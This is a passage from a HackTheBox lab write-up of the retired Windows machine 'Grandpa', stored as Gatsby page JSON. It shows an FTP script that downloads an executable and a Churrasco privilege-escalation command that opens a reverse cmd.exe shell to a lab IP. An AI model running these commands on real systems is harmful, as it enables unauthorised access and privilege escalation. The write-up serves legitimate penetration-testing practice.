operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> binary <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> get c.exe c.exe <span class=\"token operator\">>></span> ftp.txt <span class=\"token operator\">&amp;&amp;</span> <span class=\"token builtin class-name\">echo</span> quit <span class=\"token operator\">>></span> ftp.txt\n\n<span class=\"token function\">ftp</span> -n <span class=\"token operator\">&lt;</span> ftp.txt\n.<span class=\"token punctuation\">\\</span>c.exe -d <span class=\"token string\">\"C:\\wmpub<span class=\"token entity\" title=\"\\n\">\\n</span>c.exe -e cmd.exe 10.10.14.3 9999\"</span></code></pre></div>\n<p>This gave me a shell with Admin privileges.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 564px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/98a258d0272280cdd6dea390bfd1c3ea/ba4d9/image-20220612104939676.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 14.166666666666666%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAjElEQVQI15XMQQ6DIABEUW9TwaYUFRAEEU3beP8D/RJdddnFS35mMU35vIilMK8rgw+4mLAh4uZEzOWUy05cCm5KhDnjQyamjZTK2an2knecjTTv4yCVjcF5eluZidEGHtog7pru3iM7jZQ9QmqEuEh5bT/q3ihtGYyvAv3ozzNjZ5Sy3FpF2z7/oPgCx4tgXdY6qDkAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/98a258d0272280cdd6dea390bfd1c3ea/8ac56/image-20220612104939676.webp 240w,\n/static/98a258d0272280cdd6dea390bfd1c3ea/d3be9/image-20220612104939676.webp 480w,\n/static/98a258d0272280cdd6dea390bfd1c3ea/0a341/image-20220612104939676.webp 564w\"\n              sizes=\"(max-width: 564px) 100vw, 564px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/98a258d0272280cdd6dea390bfd1c3ea/8ff5a/image-20220612104939676.png 240w,\n/static/98a258d0272280cdd6dea390bfd1c3ea/e85cb/image-20220612104939676.png 480w,\n/static/98a258d0272280cdd6dea390bfd1c3ea/ba4d9/image-20220612104939676.png 564w\"\n            sizes=\"(max-width: 564px) 100vw, 564px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/98a258d0272280cdd6dea390bfd1c3ea/ba4d9/image-20220612104939676.png\"\n            alt=\"image-20220612104939676\"\n            title=\"image-20220612104939676\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Honestly I don’t fully understand what Churrasco is doing under the hood, but the source is about 400 lines, so I plan to read through it properly when I have time.</p>\n<p>Reference: <a href=\"https://github.com/Re4son/Churrasco/blob/master/Churrasco.cpp\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Churrasco/Churrasco.cpp at master · Re4son/Churrasco · GitHub</a></p>\n<p>Note: when transferring an executable to Windows via FTP, if you use the default ASCII mode instead of the <code class=\"language-text\">binary</code> option, the following error will appear:</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">c.exe\nThis program cannot be run <span class=\"token keyword\">in</span> DOS mode.</code></pre></div>\n<p>Reference: <a href=\"https://security.stackexchange.com/questions/133946/this-program-can-not-be-run-in-dos-mode\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">privilege escalation - This Program Can not Be Run in DOS Mode - Information Security Stack Exchange</a></p>\n<p>Reference: <a href=\"https://www.jscape.com/blog/ftp-binary-and-ascii-transfer-types-and-the-case-of-corrupt-files\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">FTP Binary And ASCII Transfer Types And The Case Of Corrupt Files | JSCAPE</a></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>Windows exploits are hard to understand in detail, so I don’t feel like I’m really hacking.</p>\n<p>I want to get to the point where I can understand them properly.</p>","fields":{"slug":"/hackthebox-windows-grandpa-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2022-06-04","description":"A writeup of the retired HackTheBox machine 'Grandpa'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Grandpa (Easy/Windows)","socialImage":{"publicURL":"/static/65e0040c358d6e6aac91d33a338c1b69/hackthebox-windows-grandpa.png"}}}},"pageContext":{"slug":"/hackthebox-windows-grandpa-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}